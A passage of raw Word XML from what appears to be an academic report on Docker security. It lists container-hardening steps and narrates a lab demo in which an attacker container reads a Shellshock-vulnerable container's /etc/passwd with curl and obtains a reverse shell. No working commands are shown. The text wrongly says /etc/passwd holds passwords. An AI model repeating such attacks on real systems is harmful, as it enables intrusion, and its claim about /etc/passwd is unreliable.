      <w:r w:rsidR="006C66FF">
        <w:t>of numerous business enterprises</w:t>
      </w:r>
      <w:r w:rsidR="003372AE">
        <w:t xml:space="preserve"> and organisations</w:t>
      </w:r>
      <w:r w:rsidR="00AB509D">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00390FD0">
        <w:t>production.</w:t>
      </w:r>
      <w:r w:rsidR="00577FC8">
        <w:t xml:space="preserve"> In such </w:t>
      </w:r>
      <w:r w:rsidR="0003386B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001F7BB6">
        <w:t>scenario,</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F7BB6">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> malicious actor can apply similar techniques </w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> this attack to </w:t>
      </w:r>
      <w:r w:rsidR="00556313">
        <w:t>steal valuable data</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00C31777">
        <w:t>disrupt business services.</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t xml:space="preserve"> However, this attack can also </w:t>
      </w:r>
      <w:r w:rsidR="00DE6E41">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="00C113B4">
        <w:t>mediated using various techniques and methods</w:t>
      </w:r>
      <w:r w:rsidR="00B937C3">
        <w:t>, discussed in</w:t>
      </w:r>
      <w:r w:rsidR="00B937C3" w:rsidRPr="00C02D4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="129984174"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1229648885"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C113B4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE6E41">
        <w:t xml:space="preserve"> Some of the </w:t>
      </w:r>
      <w:r w:rsidR="005A4696">
        <w:t>techniques to prevent such an attack are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D24036" w14:textId="2B3AC8BC" w:rsidR="003C0B9D" w:rsidRDefault="00CD4878" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run containers with </w:t>
      </w:r>
      <w:r w:rsidR="00122378">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unprivileged </w:t>
      </w:r>
      <w:r w:rsidR="00083C16">
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4C1F9" w14:textId="55E37DE2" w:rsidR="00083C16" w:rsidRDefault="00083C16" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set volumes to read-only to avoid </w:t>
      </w:r>
      <w:r w:rsidR="006F4BD5">
        <w:t>container breakout attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13612CA2" w14:textId="30DD9B6D" w:rsidR="006F4BD5" w:rsidRDefault="009C1FFD" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not expose </w:t>
      </w:r>
      <w:r w:rsidR="00AF081B">
        <w:t>the /var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="00122378">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="00B479BD">
        <w:t xml:space="preserve">share it </w:t>
      </w:r>
      <w:r w:rsidR="00AF081B">
        <w:t>with trusted containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC95CB" w14:textId="7A2CEBB7" w:rsidR="001E5BE2" w:rsidRDefault="001E5BE2" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not expose ports</w:t>
      </w:r>
      <w:r w:rsidR="003979E6">
        <w:t xml:space="preserve"> unless they are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D1DBB" w14:textId="608F5676" w:rsidR="002C55BA" w:rsidRDefault="00D46ACC" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always scan and verify Docker images</w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE4002">
        <w:t xml:space="preserve">downloaded </w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="00BE4002">
        <w:t>public repositor</w:t>
      </w:r>
      <w:r w:rsidR="00181528">
        <w:t>ies, such as</w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B710F1B" w14:textId="77750D54" w:rsidR="002F6967" w:rsidRDefault="001A62D4" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t xml:space="preserve">defined network rather </w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t xml:space="preserve">than using </w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t>the default Docker bridge network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBD903" w14:textId="77777777" w:rsidR="005A3D1F" w:rsidRDefault="005A3D1F" w:rsidP="005A3D1F"/>
    <w:p w14:paraId="5AEC861C" w14:textId="51976CEF" w:rsidR="005A3D1F" w:rsidRDefault="005A3D1F" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760DE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerable application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F609314" w14:textId="4830BD14" w:rsidR="00C165BA" w:rsidRDefault="0098516B" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">reat actors can </w:t>
      </w:r>
      <w:r w:rsidR="00A25C7E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>take advantage of vulnerable applic</w:t>
      </w:r>
      <w:r w:rsidR="00CF21E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ation</w:t>
      </w:r>
      <w:r w:rsidR="00F03FA1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CF21E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit and steal valuable information</w:t>
      </w:r>
      <w:r w:rsidR="007B688E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F51886">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> For this reason, a</w:t>
      </w:r>
      <w:r w:rsidR="00F6081E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">n application vulnerable to reverse shell or shellshock was </w:t>
      </w:r>
      <w:r w:rsidR="0070591E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">downloaded from Docker Hub to demonstrate such </w:t>
      </w:r>
      <w:r w:rsidR="00CE080B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attacks.</w:t>
      </w:r>
      <w:r w:rsidR="008A7993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="002C4606">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="004335A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">that runs the application exposes port 80 </w:t>
      </w:r>
      <w:r w:rsidR="00C70D9A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>and is mapped to port 8080 on</w:t>
      </w:r>
      <w:r w:rsidR="00CD3BF8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Docker host. This means external </w:t>
      </w:r>
      <w:r w:rsidR="00EE166D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hosts can access the application via port 8080.</w:t>
      </w:r>
      <w:r w:rsidR="00ED5430">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vulnerable application and the </w:t>
      </w:r>
      <w:r w:rsidR="009728D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="00CF1F63">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r w:rsidR="00ED5430">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="009C21CC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>connected via the default Docker network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="00CF1F63">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="009728D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">previously discussed, </w:t>
      </w:r>
      <w:r w:rsidR="0016050F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>containers connected to the same bridge can communicate and exchange data.</w:t>
      </w:r>
      <w:r w:rsidR="00446E29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thus, the </w:t>
      </w:r>
      <w:r w:rsidR="005947E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">author accessed </w:t>
      </w:r>
      <w:r w:rsidR="006F1BFB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>confidential files, like “/etc/passwd”</w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E94C4B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">of the application container </w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00A17C01">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl tool from the attacker container (alpine)</w:t>
      </w:r>
      <w:r w:rsidR="002C278F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00C50078">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>of the application</w:t>
      </w:r>
      <w:r w:rsidR="0089309E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00C50078">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00C60C66">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C60C66">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="00E3172C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">is the file directory </w:t>
      </w:r>
      <w:r w:rsidR="004E1075">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00EB535F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>contai</w:t>
      </w:r>
      <w:r w:rsidR="009C3AC1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:r w:rsidR="000608B3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973448">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>user’s</w:t>
      </w:r>
      <w:r w:rsidR="000608B3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r w:rsidR="00C73C9D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001F3B34">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, and hence, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00886DC6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">can alter this </w:t>
      </w:r>
      <w:r w:rsidR="006804AA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">valuable information to </w:t>
      </w:r>
      <w:r w:rsidR="00AF2243">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>broaden</w:t>
      </w:r>
      <w:r w:rsidR="006804AA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> his/her attack surface.</w:t>
      </w:r>
      <w:r w:rsidR="00724717">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="009D4B90">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>66 shows th</w:t>
      </w:r>
      <w:r w:rsidR="00341A33">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="009D4B90">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker </w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidR="0071269B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00C02904">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> file directory </w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00C02904">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> container</w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071269B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">by executing </w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>curl script</w:t>
      </w:r>
      <w:r w:rsidR="0052761F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC51335" w14:textId="5FF4F812" w:rsidR="00152A7D" w:rsidRDefault="00152A7D" w:rsidP="00152A7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B942842" wp14:editId="1DD92513">
            <wp:extent cx="3858895" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="825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862691" cy="1436512"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDC113" w14:textId="49E69423" w:rsidR="00152A7D" w:rsidRDefault="00152A7D" w:rsidP="00152A7D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc86858657"/>
      <w:bookmarkStart w:id="221" w:name="_Toc86867547"/>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Accessing the /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00724717">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="7AA239CF" w14:textId="3CCC4A7B" w:rsidR="0052761F" w:rsidRDefault="0052761F" w:rsidP="0052761F">
      <w:r>
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="005A36B7">
        <w:t xml:space="preserve">the attacker </w:t>
      </w:r>
      <w:r w:rsidR="009A4EA6">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="007C1186">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009A4EA6">
        <w:t xml:space="preserve">reverse shell attack </w:t>
      </w:r>
      <w:r w:rsidR="004E5492">
        <w:t>by exploiting more vulnerabilities of the application.</w:t>
      </w:r>
      <w:r w:rsidR="007C1186">
        <w:t xml:space="preserve"> To achieve this</w:t>
      </w:r>
      <w:r w:rsidR="00F30EBB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B67E4D">
        <w:t xml:space="preserve"> the author used two containers</w:t>
      </w:r>
      <w:r w:rsidR="009F6EBA">
        <w:t xml:space="preserve">: one to execute the script </w:t>
      </w:r>
      <w:r w:rsidR="000859E9">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="009F6EBA">
        <w:t xml:space="preserve"> figure 67</w:t>
      </w:r>
      <w:r w:rsidR="006D4D75">
        <w:t xml:space="preserve"> and the second used to monitor </w:t>
      </w:r>
      <w:r w:rsidR="0050214A">
        <w:t>incoming traffics</w:t>
      </w:r>
      <w:r w:rsidR="000859E9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000707BB">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00C16B18">
        <w:t xml:space="preserve">he attacker manages to get </w:t>
      </w:r>
      <w:r w:rsidR="00CE2E1B">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F27814">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E0120">
        <w:t>reverse shell on the listener container</w:t>
      </w:r>
      <w:r w:rsidR="006C5471">
